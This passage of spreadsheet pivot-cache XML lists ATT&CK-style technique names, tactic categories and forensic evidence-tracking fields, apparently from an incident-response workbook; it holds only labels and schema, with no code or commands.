        <s v="Masquerading: Right-to-Left Override"/>
        <s v="Masquerading: Space after Filename"/>
        <s v="Modify Authentication Process"/>
        <s v="Modify Authentication Process: Domain Controller Authentication"/>
        <s v="Modify Authentication Process: Network Device Authentication"/>
        <s v="Modify Authentication Process: Password Filter DLL"/>
        <s v="Modify Authentication Process: Pluggable Authentication Modules"/>
        <s v="Modify Cloud Compute Infrastructure"/>
        <s v="Modify Cloud Compute Infrastructure: Create Cloud Instance"/>
        <s v="Modify Cloud Compute Infrastructure: Create Snapshot"/>
        <s v="Modify Cloud Compute Infrastructure: Delete Cloud Instance"/>
        <s v="Modify Cloud Compute Infrastructure: Revert Cloud Instance"/>
        <s v="Modify Registry"/>
        <s v="Modify System Image"/>
        <s v="Modify System Image: Downgrade System Image"/>
        <s v="Modify System Image: Patch System Image"/>
        <s v="Multi-Stage Channels"/>
        <s v="Native API"/>
        <s v="Network Boundary Bridging"/>
        <s v="Network Boundary Bridging: Network Address Translation Traversal"/>
        <s v="Network Denial of Service"/>
        <s v="Network Denial of Service: Direct Network Flood"/>
        <s v="Network Denial of Service: Reflection Amplification"/>
        <s v="Network Service Scanning"/>
        <s v="Network Share Discovery"/>
        <s v="Network Sniffing"/>
        <s v="Non-Application Layer Protocol"/>
        <s v="Non-Standard Port"/>
        <s v="OS Credential Dumping"/>
        <s v="OS Credential Dumping: /etc/passwd and /etc/shadow"/>
        <s v="OS Credential Dumping: Cached Domain Credentials"/>
        <s v="OS Credential Dumping: DCSync"/>
        <s v="OS Credential Dumping: LSA Secrets"/>
        <s v="OS Credential Dumping: LSASS Memory"/>
        <s v="OS Credential Dumping: NTDS"/>
        <s v="OS Credential Dumping: Proc Filesystem"/>
        <s v="OS Credential Dumping: Security Account Manager"/>
        <s v="Obfuscated Files or Information"/>
        <s v="Obfuscated Files or Information: Binary Padding"/>
        <s v="Obfuscated Files or Information: Compile After Delivery"/>
        <s v="Obfuscated Files or Information: Indicator Removal from Tools"/>
        <s v="Obfuscated Files or Information: Software Packing"/>
        <s v="Obfuscated Files or Information: Steganography"/>
        <s v="Obtain Capabilities"/>
        <s v="Obtain Capabilities: Code Signing Certificates"/>
        <s v="Obtain Capabilities: Digital Certificates"/>
        <s v="Obtain Capabilities: Exploits"/>
        <s v="Obtain Capabilities: Malware"/>
        <s v="Obtain Capabilities: Tool"/>
        <s v="Obtain Capabilities: Vulnerabilities"/>
        <s v="Office Application Startup"/>
        <s v="Office Application Startup: Add-ins"/>
        <s v="Office Application Startup: Office Template Macros"/>
        <s v="Office Application Startup: Office Test"/>
        <s v="Office Application Startup: Outlook Forms"/>
        <s v="Office Application Startup: Outlook Home Page"/>
        <s v="Office Application Startup: Outlook Rules"/>
        <s v="Password Policy Discovery"/>
        <s v="Peripheral Device Discovery"/>
        <s v="Permission Groups Discovery"/>
        <s v="Permission Groups Discovery: Cloud Groups"/>
        <s v="Permission Groups Discovery: Domain Groups"/>
        <s v="Permission Groups Discovery: Local Groups"/>
        <s v="Phishing"/>
        <s v="Phishing for Information"/>
        <s v="Phishing for Information: Spearphishing Attachment"/>
        <s v="Phishing for Information: Spearphishing Link"/>
        <s v="Phishing for Information: Spearphishing Service"/>
        <s v="Phishing: Spearphishing Attachment"/>
        <s v="Phishing: Spearphishing Link"/>
        <s v="Phishing: Spearphishing via Service"/>
        <s v="Pre-OS Boot"/>
        <s v="Pre-OS Boot: Bootkit"/>
        <s v="Pre-OS Boot: Component Firmware"/>
        <s v="Pre-OS Boot: ROMMONkit"/>
        <s v="Pre-OS Boot: System Firmware"/>
        <s v="Pre-OS Boot: TFTP Boot"/>
        <s v="Process Discovery"/>
        <s v="Process Injection"/>
        <s v="Process Injection: Asynchronous Procedure Call"/>
        <s v="Process Injection: Dynamic-link Library Injection"/>
        <s v="Process Injection: Extra Window Memory Injection"/>
        <s v="Process Injection: Portable Executable Injection"/>
        <s v="Process Injection: Proc Memory"/>
        <s v="Process Injection: Process Doppelgänging"/>
        <s v="Process Injection: Process Hollowing"/>
        <s v="Process Injection: Ptrace System Calls"/>
        <s v="Process Injection: Thread Execution Hijacking"/>
        <s v="Process Injection: Thread Local Storage"/>
        <s v="Process Injection: VDSO Hijacking"/>
        <s v="Protocol Tunneling"/>
        <s v="Proxy"/>
        <s v="Proxy: Domain Fronting"/>
        <s v="Proxy: External Proxy"/>
        <s v="Proxy: Internal Proxy"/>
        <s v="Proxy: Multi-hop Proxy"/>
        <s v="Query Registry"/>
        <s v="Remote Access Software"/>
        <s v="Remote Service Session Hijacking"/>
        <s v="Remote Service Session Hijacking: RDP Hijacking"/>
        <s v="Remote Service Session Hijacking: SSH Hijacking"/>
        <s v="Remote Services"/>
        <s v="Remote Services: Distributed Component Object Model"/>
        <s v="Remote Services: Remote Desktop Protocol"/>
        <s v="Remote Services: SMB/Windows Admin Shares"/>
        <s v="Remote Services: SSH"/>
        <s v="Remote Services: VNC"/>
        <s v="Remote Services: Windows Remote Management"/>
        <s v="Remote System Discovery"/>
        <s v="Replication Through Removable Media"/>
        <s v="Resource Hijacking"/>
        <s v="Rogue Domain Controller"/>
        <s v="Rootkit"/>
        <s v="Scheduled Task/Job"/>
        <s v="Scheduled Task/Job: At (Linux)"/>
        <s v="Scheduled Task/Job: At (Windows)"/>
        <s v="Scheduled Task/Job: Container Orchestration Job"/>
        <s v="Scheduled Task/Job: Cron"/>
        <s v="Scheduled Task/Job: Launchd"/>
        <s v="Scheduled Task/Job: Scheduled Task"/>
        <s v="Scheduled Task/Job: Systemd Timers"/>
        <s v="Scheduled Transfer"/>
        <s v="Screen Capture"/>
        <s v="Search Closed Sources"/>
        <s v="Search Closed Sources: Purchase Technical Data"/>
        <s v="Search Closed Sources: Threat Intel Vendors"/>
        <s v="Search Open Technical Databases"/>
        <s v="Search Open Technical Databases: CDNs"/>
        <s v="Search Open Technical Databases: DNS/Passive DNS"/>
        <s v="Search Open Technical Databases: Digital Certificates"/>
        <s v="Search Open Technical Databases: Scan Databases"/>
        <s v="Search Open Technical Databases: WHOIS"/>
        <s v="Search Open Websites/Domains"/>
        <s v="Search Open Websites/Domains: Search Engines"/>
        <s v="Search Open Websites/Domains: Social Media"/>
        <s v="Search Victim-Owned Websites"/>
        <s v="Server Software Component"/>
        <s v="Server Software Component: SQL Stored Procedures"/>
        <s v="Server Software Component: Transport Agent"/>
        <s v="Server Software Component: Web Shell"/>
        <s v="Service Stop"/>
        <s v="Shared Modules"/>
        <s v="Signed Binary Proxy Execution"/>
        <s v="Signed Binary Proxy Execution: CMSTP"/>
        <s v="Signed Binary Proxy Execution: Compiled HTML File"/>
        <s v="Signed Binary Proxy Execution: Control Panel"/>
        <s v="Signed Binary Proxy Execution: InstallUtil"/>
        <s v="Signed Binary Proxy Execution: Mshta"/>
        <s v="Signed Binary Proxy Execution: Msiexec"/>
        <s v="Signed Binary Proxy Execution: Odbcconf"/>
        <s v="Signed Binary Proxy Execution: Regsvcs/Regasm"/>
        <s v="Signed Binary Proxy Execution: Regsvr32"/>
        <s v="Signed Binary Proxy Execution: Rundll32"/>
        <s v="Signed Binary Proxy Execution: Verclsid"/>
        <s v="Signed Script Proxy Execution"/>
        <s v="Signed Script Proxy Execution: PubPrn"/>
        <s v="Software Deployment Tools"/>
        <s v="Software Discovery"/>
        <s v="Software Discovery: Security Software Discovery"/>
        <s v="Stage Capabilities"/>
        <s v="Stage Capabilities: Drive-by Target"/>
        <s v="Stage Capabilities: Install Digital Certificate"/>
        <s v="Stage Capabilities: Link Target"/>
        <s v="Stage Capabilities: Upload Malware"/>
        <s v="Stage Capabilities: Upload Tool"/>
        <s v="Steal Application Access Token"/>
        <s v="Steal Web Session Cookie"/>
        <s v="Steal or Forge Kerberos Tickets"/>
        <s v="Steal or Forge Kerberos Tickets: AS-REP Roasting"/>
        <s v="Steal or Forge Kerberos Tickets: Golden Ticket"/>
        <s v="Steal or Forge Kerberos Tickets: Kerberoasting"/>
        <s v="Steal or Forge Kerberos Tickets: Silver Ticket"/>
        <s v="Subvert Trust Controls"/>
        <s v="Subvert Trust Controls: Code Signing"/>
        <s v="Subvert Trust Controls: Code Signing Policy Modification"/>
        <s v="Subvert Trust Controls: Gatekeeper Bypass"/>
        <s v="Subvert Trust Controls: Install Root Certificate"/>
        <s v="Subvert Trust Controls: Mark-of-the-Web Bypass"/>
        <s v="Subvert Trust Controls: SIP and Trust Provider Hijacking"/>
        <s v="Supply Chain Compromise"/>
        <s v="Supply Chain Compromise: Compromise Hardware Supply Chain"/>
        <s v="Supply Chain Compromise: Compromise Software Dependencies and Development Tools"/>
        <s v="Supply Chain Compromise: Compromise Software Supply Chain"/>
        <s v="System Information Discovery"/>
        <s v="System Location Discovery"/>
        <s v="System Network Configuration Discovery"/>
        <s v="System Network Configuration Discovery: Internet Connection Discovery"/>
        <s v="System Network Connections Discovery"/>
        <s v="System Owner/User Discovery"/>
        <s v="System Service Discovery"/>
        <s v="System Services"/>
        <s v="System Services: Launchctl"/>
        <s v="System Services: Service Execution"/>
        <s v="System Shutdown/Reboot"/>
        <s v="System Time Discovery"/>
        <s v="Taint Shared Content"/>
        <s v="Template Injection"/>
        <s v="Traffic Signaling"/>
        <s v="Traffic Signaling: Port Knocking"/>
        <s v="Transfer Data to Cloud Account"/>
        <s v="Trusted Developer Utilities Proxy Execution"/>
        <s v="Trusted Developer Utilities Proxy Execution: MSBuild"/>
        <s v="Trusted Relationship"/>
        <s v="Two-Factor Authentication Interception"/>
        <s v="Unsecured Credentials"/>
        <s v="Unsecured Credentials: Bash History"/>
        <s v="Unsecured Credentials: Cloud Instance Metadata API"/>
        <s v="Unsecured Credentials: Container API"/>
        <s v="Unsecured Credentials: Credentials In Files"/>
        <s v="Unsecured Credentials: Credentials in Registry"/>
        <s v="Unsecured Credentials: Group Policy Preferences"/>
        <s v="Unsecured Credentials: Private Keys"/>
        <s v="Unused/Unsupported Cloud Regions"/>
        <s v="Use Alternate Authentication Material"/>
        <s v="Use Alternate Authentication Material: Application Access Token"/>
        <s v="Use Alternate Authentication Material: Pass the Hash"/>
        <s v="Use Alternate Authentication Material: Pass the Ticket"/>
        <s v="Use Alternate Authentication Material: Web Session Cookie"/>
        <s v="User Execution"/>
        <s v="User Execution: Malicious File"/>
        <s v="User Execution: Malicious Image"/>
        <s v="User Execution: Malicious Link"/>
        <s v="Valid Accounts"/>
        <s v="Valid Accounts: Cloud Accounts"/>
        <s v="Valid Accounts: Default Accounts"/>
        <s v="Valid Accounts: Domain Accounts"/>
        <s v="Valid Accounts: Local Accounts"/>
        <s v="Video Capture"/>
        <s v="Virtualization/Sandbox Evasion"/>
        <s v="Virtualization/Sandbox Evasion: System Checks"/>
        <s v="Virtualization/Sandbox Evasion: Time Based Evasion"/>
        <s v="Virtualization/Sandbox Evasion: User Activity Based Checks"/>
        <s v="Weaken Encryption"/>
        <s v="Weaken Encryption: Disable Crypto Hardware"/>
        <s v="Weaken Encryption: Reduce Key Space"/>
        <s v="Web Service"/>
        <s v="Web Service: Bidirectional Communication"/>
        <s v="Web Service: Dead Drop Resolver"/>
        <s v="Web Service: One-Way Communication"/>
        <s v="Windows Management Instrumentation"/>
        <s v="XSL Script Processing"/>
      </sharedItems>
    </cacheField>
    <cacheField name="description" numFmtId="0">
      <sharedItems longText="1"/>
    </cacheField>
    <cacheField name="url" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="created" numFmtId="14">
      <sharedItems containsSemiMixedTypes="0" containsNonDate="0" containsDate="1" containsString="0" minDate="2017-05-31T00:00:00" maxDate="2021-04-24T00:00:00"/>
    </cacheField>
    <cacheField name="last modified" numFmtId="14">
      <sharedItems containsSemiMixedTypes="0" containsNonDate="0" containsDate="1" containsString="0" minDate="2020-01-24T00:00:00" maxDate="2021-04-30T00:00:00"/>
    </cacheField>
    <cacheField name="version" numFmtId="0">
      <sharedItems containsSemiMixedTypes="0" containsString="0" containsNumber="1" minValue="1" maxValue="3.1"/>
    </cacheField>
    <cacheField name="tactics" numFmtId="0">
      <sharedItems count="30">
        <s v="Defense Evasion, Privilege Escalation"/>
        <s v="Impact"/>
        <s v="Discovery"/>
        <s v="Persistence"/>
        <s v="Resource Development"/>
        <s v="Reconnaissance"/>
        <s v="Command And Control"/>
        <s v="Collection"/>
        <s v="Exfiltration"/>
        <s v="Defense Evasion, Persistence"/>
        <s v="Persistence, Privilege Escalation"/>
        <s v="Credential Access"/>
        <s v="Defense Evasion"/>
        <s v="Execution"/>
        <s v="Defense Evasion, Execution"/>
        <s v="Initial Access"/>
        <s v="Privilege Escalation"/>
        <s v="Lateral Movement"/>
        <s v="Initial Access, Persistence"/>
        <s v="Defense Evasion, Persistence, Privilege Escalation"/>
        <s v="Collection, Credential Access"/>
        <s v="Credential Access, Defense Evasion, Persistence"/>
        <s v="Credential Access, Discovery"/>
        <s v="Initial Access, Lateral Movement"/>
        <s v="Execution, Persistence, Privilege Escalation"/>
        <s v="Execution, Lateral Movement"/>
        <s v="Command And Control, Defense Evasion, Persistence"/>
        <s v="Defense Evasion, Lateral Movement"/>
        <s v="Defense Evasion, Initial Access, Persistence, Privilege Escalation"/>
        <s v="Defense Evasion, Discovery"/>
      </sharedItems>
    </cacheField>
    <cacheField name="detection" numFmtId="0">
      <sharedItems longText="1"/>
    </cacheField>
    <cacheField name="platforms" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="data sources" numFmtId="0">
      <sharedItems containsBlank="1" longText="1"/>
    </cacheField>
    <cacheField name="is sub-technique" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="sub-technique of" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="contributors" numFmtId="0">
      <sharedItems containsBlank="1" longText="1"/>
    </cacheField>
    <cacheField name="permissions required" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="defenses bypassed" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="supports remote" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
  </cacheFields>
  <extLst>
    <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{725AE2AE-9491-48be-B2B4-4EB974FC3084}">
      <x14:pivotCacheDefinition pivotCacheId="6807596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dang Sen" refreshedDate="44417.608895370373" backgroundQuery="1" createdVersion="6" refreshedVersion="6" minRefreshableVersion="3" recordCount="0" supportSubquery="1" supportAdvancedDrill="1" xr:uid="{D6C0B6E2-F3E6-4258-85CD-D0DE9DBE2D04}">
  <cacheSource type="external" connectionId="3"/>
  <cacheFields count="2">
    <cacheField name="[MT].[name].[name]" caption="name" numFmtId="0" hierarchy="19" level="1">
      <sharedItems count="185">
        <s v="Abuse Elevation Control Mechanism"/>
        <s v="Access Token Manipulation"/>
        <s v="Account Access Removal"/>
        <s v="Account Discovery"/>
        <s v="Account Manipulation"/>
        <s v="Acquire Infrastructure"/>
        <s v="Active Scanning"/>
        <s v="Application Layer Protocol"/>
        <s v="Application Window Discovery"/>
        <s v="Archive Collected Data"/>
        <s v="Audio Capture"/>
        <s v="Automated Collection"/>
        <s v="Automated Exfiltration"/>
        <s v="BITS Jobs"/>
        <s v="Boot or Logon Autostart Execution"/>
        <s v="Boot or Logon Initialization Scripts"/>
        <s v="Browser Bookmark Discovery"/>
        <s v="Browser Extensions"/>
        <s v="Brute Force"/>
        <s v="Build Image on Host"/>
        <s v="Clipboard Data"/>
        <s v="Cloud Infrastructure Discovery"/>
        <s v="Cloud Service Dashboard"/>
        <s v="Cloud Service Discovery"/>
        <s v="Command and Scripting Interpreter"/>
        <s v="Communication Through Removable Media"/>
        <s v="Compromise Accounts"/>
        <s v="Compromise Client Software Binary"/>
        <s v="Compromise Infrastructure"/>
        <s v="Container Administration Command"/>
        <s v="Container and Resource Discovery"/>
        <s v="Create Account"/>
        <s v="Create or Modify System Process"/>
        <s v="Credentials from Password Stores"/>
        <s v="Data Destruction"/>
        <s v="Data Encoding"/>
        <s v="Data Encrypted for Impact"/>
        <s v="Data from Cloud Storage Object"/>
        <s v="Data from Configuration Repository"/>
        <s v="Data from Information Repositories"/>
        <s v="Data from Local System"/>
        <s v="Data from Network Shared Drive"/>
        <s v="Data from Removable Media"/>
        <s v="Data Manipulation"/>
        <s v="Data Obfuscation"/>
        <s v="Data Staged"/>
        <s v="Data Transfer Size Limits"/>
        <s v="Defacement"/>
        <s v="Deobfuscate/Decode Files or Information"/>
        <s v="Deploy Container"/>
        <s v="Develop Capabilities"/>
        <s v="Direct Volume Access"/>
        <s v="Disk Wipe"/>
        <s v="Domain Policy Modification"/>
        <s v="Domain Trust Discovery"/>
        <s v="Drive-by Compromise"/>
        <s v="Dynamic Resolution"/>
        <s v="Email Collection"/>
        <s v="Encrypted Channel"/>
        <s v="Endpoint Denial of Service"/>
        <s v="Escape to Host"/>
        <s v="Establish Accounts"/>
        <s v="Event Triggered Execution"/>
        <s v="Execution Guardrails"/>
        <s v="Exfiltration Over Alternative Protocol"/>
        <s v="Exfiltration Over C2 Channel"/>
        <s v="Exfiltration Over Other Network Medium"/>
        <s v="Exfiltration Over Physical Medium"/>
        <s v="Exfiltration Over Web Service"/>
        <s v="Exploit Public-Facing Application"/>
        <s v="Exploitation for Client Execution"/>
        <s v="Exploitation for Credential Access"/>
        <s v="Exploitation for Defense Evasion"/>
        <s v="Exploitation for Privilege Escalation"/>
        <s v="Exploitation of Remote Services"/>
        <s v="External Remote Services"/>
        <s v="Fallback Channels"/>
        <s v="File and Directory Discovery"/>
        <s v="File and Directory Permissions Modification"/>
        <s v="Firmware Corruption"/>
        <s v="Forced Authentication"/>
        <s v="Forge Web Credentials"/>
        <s v="Gather Victim Host Information"/>
        <s v="Gather Victim Identity Information"/>
        <s v="Gather Victim Network Information"/>
        <s v="Gather Victim Org Information"/>
        <s v="Hardware Additions"/>
        <s v="Hide Artifacts"/>
        <s v="Hijack Execution Flow"/>
        <s v="Impair Defenses"/>
        <s v="Implant Internal Image"/>
        <s v="Indicator Removal on Host"/>
        <s v="Indirect Command Execution"/>
        <s v="Ingress Tool Transfer"/>
        <s v="Inhibit System Recovery"/>
        <s v="Input Capture"/>
        <s v="Internal Spearphishing"/>
        <s v="Inter-Process Communication"/>
        <s v="Lateral Tool Transfer"/>
        <s v="Man in the Browser"/>
        <s v="Man-in-the-Middle"/>
        <s v="Masquerading"/>
        <s v="Modify Authentication Process"/>
        <s v="Modify Cloud Compute Infrastructure"/>
        <s v="Modify Registry"/>
        <s v="Modify System Image"/>
        <s v="Multi-Stage Channels"/>
        <s v="Native API"/>
        <s v="Network Boundary Bridging"/>
        <s v="Network Denial of Service"/>
        <s v="Network Service Scanning"/>
        <s v="Network Share Discovery"/>
        <s v="Network Sniffing"/>
        <s v="Non-Application Layer Protocol"/>
        <s v="Non-Standard Port"/>
        <s v="Obfuscated Files or Information"/>
        <s v="Obtain Capabilities"/>
        <s v="Office Application Startup"/>
        <s v="OS Credential Dumping"/>
        <s v="Password Policy Discovery"/>
        <s v="Peripheral Device Discovery"/>
        <s v="Permission Groups Discovery"/>
        <s v="Phishing"/>
        <s v="Phishing for Information"/>
        <s v="Pre-OS Boot"/>
        <s v="Process Discovery"/>
        <s v="Process Injection"/>
        <s v="Protocol Tunneling"/>
        <s v="Proxy"/>
        <s v="Query Registry"/>
        <s v="Remote Access Software"/>
        <s v="Remote Service Session Hijacking"/>
        <s v="Remote Services"/>
        <s v="Remote System Discovery"/>
        <s v="Replication Through Removable Media"/>
        <s v="Resource Hijacking"/>
        <s v="Rogue Domain Controller"/>
        <s v="Rootkit"/>
        <s v="Scheduled Task/Job"/>
        <s v="Scheduled Transfer"/>
        <s v="Screen Capture"/>
        <s v="Search Closed Sources"/>
        <s v="Search Open Technical Databases"/>
        <s v="Search Open Websites/Domains"/>
        <s v="Search Victim-Owned Websites"/>
        <s v="Server Software Component"/>
        <s v="Service Stop"/>
        <s v="Shared Modules"/>
        <s v="Signed Binary Proxy Execution"/>
        <s v="Signed Script Proxy Execution"/>
        <s v="Software Deployment Tools"/>
        <s v="Software Discovery"/>
        <s v="Stage Capabilities"/>
        <s v="Steal Application Access Token"/>
        <s v="Steal or Forge Kerberos Tickets"/>
        <s v="Steal Web Session Cookie"/>
        <s v="Subvert Trust Controls"/>
        <s v="Supply Chain Compromise"/>
        <s v="System Information Discovery"/>
        <s v="System Location Discovery"/>
        <s v="System Network Configuration Discovery"/>
        <s v="System Network Connections Discovery"/>
        <s v="System Owner/User Discovery"/>
        <s v="System Service Discovery"/>
        <s v="System Services"/>
        <s v="System Shutdown/Reboot"/>
        <s v="System Time Discovery"/>
        <s v="Taint Shared Content"/>
        <s v="Template Injection"/>
        <s v="Traffic Signaling"/>
        <s v="Transfer Data to Cloud Account"/>
        <s v="Trusted Developer Utilities Proxy Execution"/>
        <s v="Trusted Relationship"/>
        <s v="Two-Factor Authentication Interception"/>
        <s v="Unsecured Credentials"/>
        <s v="Unused/Unsupported Cloud Regions"/>
        <s v="Use Alternate Authentication Material"/>
        <s v="User Execution"/>
        <s v="Valid Accounts"/>
        <s v="Video Capture"/>
        <s v="Virtualization/Sandbox Evasion"/>
        <s v="Weaken Encryption"/>
        <s v="Web Service"/>
        <s v="Windows Management Instrumentation"/>
        <s v="XSL Script Processing"/>
      </sharedItems>
    </cacheField>
    <cacheField name="[MT].[is sub-technique].[is sub-technique]" caption="is sub-technique" numFmtId="0" hierarchy="29" level="1">
      <sharedItems count="1">
        <b v="0"/>
      </sharedItems>
    </cacheField>
  </cacheFields>
  <cacheHierarchies count="96">
    <cacheHierarchy uniqueName="[Evidence].[Hostname]" caption="Hostname" attribute="1" defaultMemberUniqueName="[Evidence].[Hostname].[All]" allUniqueName="[Evidence].[Hostname].[All]" dimensionUniqueName="[Evidence]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Evidence].[Date Added]" caption="Date Added" attribute="1" time="1" defaultMemberUniqueName="[Evidence].[Date Added].[All]" allUniqueName="[Evidence].[Date Added].[All]" dimensionUniqueName="[Evidence]" displayFolder="" count="0" memberValueDatatype="7" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Evidence].[Added By]" caption="Added By" attribute="1" defaultMemberUniqueName="[Evidence].[Added By].[All]" allUniqueName="[Evidence].[Added By].[All]" dimensionUniqueName="[Evidence]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Evidence].[Type]" caption="Type" attribute="1" defaultMemberUniqueName="[Evidence].[Type].[All]" allUniqueName="[Evidence].[Type].[All]" dimensionUniqueName="[Evidence]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Evidence].[Status]" caption="Status" attribute="1" defaultMemberUniqueName="[Evidence].[Status].[All]" allUniqueName="[Evidence].[Status].[All]" dimensionUniqueName="[Evidence]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Evidence].[Evidence Tag]" caption="Evidence Tag" attribute="1" defaultMemberUniqueName="[Evidence].[Evidence Tag].[All]" allUniqueName="[Evidence].[Evidence Tag].[All]" dimensionUniqueName="[Evidence]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Evidence].[OS]" caption="OS" attribute="1" defaultMemberUniqueName="[Evidence].[OS].[All]" allUniqueName="[Evidence].[OS].[All]" dimensionUniqueName="[Evidence]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Evidence].[Analyst]" caption="Analyst" attribute="1" defaultMemberUniqueName="[Evidence].[Analyst].[All]" allUniqueName="[Evidence].[Analyst].[All]" dimensionUniqueName="[Evidence]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Evidence].[When Collected]" caption="When Collected" attribute="1" defaultMemberUniqueName="[Evidence].[When Collected].[All]" allUniqueName="[Evidence].[When Collected].[All]" dimensionUniqueName="[Evidence]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Evidence].[Received Date]" caption="Received Date" attribute="1" defaultMemberUniqueName="[Evidence].[Received Date].[All]" allUniqueName="[Evidence].[Received Date].[All]" dimensionUniqueName="[Evidence]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Evidence].[Received by]" caption="Received by" attribute="1" defaultMemberUniqueName="[Evidence].[Received by].[All]" allUniqueName="[Evidence].[Received by].[All]" dimensionUniqueName="[Evidence]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Evidence].[Verified by]" caption="Verified by" attribute="1" defaultMemberUniqueName="[Evidence].[Verified by].[All]" allUniqueName="[Evidence].[Verified by].[All]" dimensionUniqueName="[Evidence]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Evidence].[Data Location]" caption="Data Location" attribute="1" defaultMemberUniqueName="[Evidence].[Data Location].[All]" allUniqueName="[Evidence].[Data Location].[All]" dimensionUniqueName="[Evidence]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Evidence].[Image Name]" caption="Image Name" attribute="1" defaultMemberUniqueName="[Evidence].[Image Name].[All]" allUniqueName="[Evidence].[Image Name].[All]" dimensionUniqueName="[Evidence]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Evidence].[Acquisition MD5]" caption="Acquisition MD5" attribute="1" defaultMemberUniqueName="[Evidence].[Acquisition MD5].[All]" allUniqueName="[Evidence].[Acquisition MD5].[All]" dimensionUniqueName="[Evidence]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Evidence].[Acquisition SHA1]" caption="Acquisition SHA1" attribute="1" defaultMemberUniqueName="[Evidence].[Acquisition SHA1].[All]" allUniqueName="[Evidence].[Acquisition SHA1].[All]" dimensionUniqueName="[Evidence]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Evidence].[Encryption key]" caption="Encryption key" attribute="1" defaultMemberUniqueName="[Evidence].[Encryption key].[All]" allUniqueName="[Evidence].[Encryption key].[All]" dimensionUniqueName="[Evidence]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Evidence].[Notes]" caption="Notes" attribute="1" defaultMemberUniqueName="[Evidence].[Notes].[All]" allUniqueName="[Evidence].[Notes].[All]" dimensionUniqueName="[Evidence]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[MT].[ID]" caption="ID" attribute="1" defaultMemberUniqueName="[MT].[ID].[All]" allUniqueName="[MT].[ID].[All]" dimensionUniqueName="[MT]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[MT].[name]" caption="name" attribute="1" defaultMemberUniqueName="[MT].[name].[All]" allUniqueName="[MT].[name].[All]" dimensionUniqueName="[MT]" displayFolder="" count="2" memberValueDatatype="130" unbalanced="0">
      <fieldsUsage count="2">
        <fieldUsage x="-1"/>
        <fieldUsage x="0"/>
      </fieldsUsage>
    </cacheHierarchy>
    <cacheHierarchy uniqueName="[MT].[description]" caption="description" attribute="1" defaultMemberUniqueName="[MT].[description].[All]" allUniqueName="[MT].[description].[All]" dimensionUniqueName="[MT]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[MT].[url]" caption="url" attribute="1" defaultMemberUniqueName="[MT].[url].[All]" allUniqueName="[MT].[url].[All]" dimensionUniqueName="[MT]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[MT].[created]" caption="created" attribute="1" time="1" defaultMemberUniqueName="[MT].[created].[All]" allUniqueName="[MT].[created].[All]" dimensionUniqueName="[MT]" displayFolder="" count="0" memberValueDatatype="7" unbalanced="0"/>
    <cacheHierarchy uniqueName="[MT].[last modified]" caption="last modified" attribute="1" time="1" defaultMemberUniqueName="[MT].[last modified].[All]" allUniqueName="[MT].[last modified].[All]" dimensionUniqueName="[MT]" displayFolder="" count="0" memberValueDatatype="7" unbalanced="0"/>
    <cacheHierarchy uniqueName="[MT].[version]" caption="version" attribute="1" defaultMemberUniqueName="[MT].[version].[All]" allUniqueName="[MT].[version].[All]" dimensionUniqueName="[MT]" displayFolder="" count="0" memberValueDatatype="5" unbalanced="0"/>
    <cacheHierarchy uniqueName="[MT].[tactics]" caption="tactics" attribute="1" defaultMemberUniqueName="[MT].[tactics].[All]" allUniqueName="[MT].[tactics].[All]" dimensionUniqueName="[MT]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[MT].[detection]" caption="detection" attribute="1" defaultMemberUniqueName="[MT].[detection].[All]" allUniqueName="[MT].[detection].[All]" dimensionUniqueName="[MT]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[MT].[platforms]" caption="platforms" attribute="1" defaultMemberUniqueName="[MT].[platforms].[All]" allUniqueName="[MT].[platforms].[All]" dimensionUniqueName="[MT]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[MT].[data sources]" caption="data sources" attribute="1" defaultMemberUniqueName="[MT].[data sources].[All]" allUniqueName="[MT].[data sources].[All]" dimensionUniqueName="[MT]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
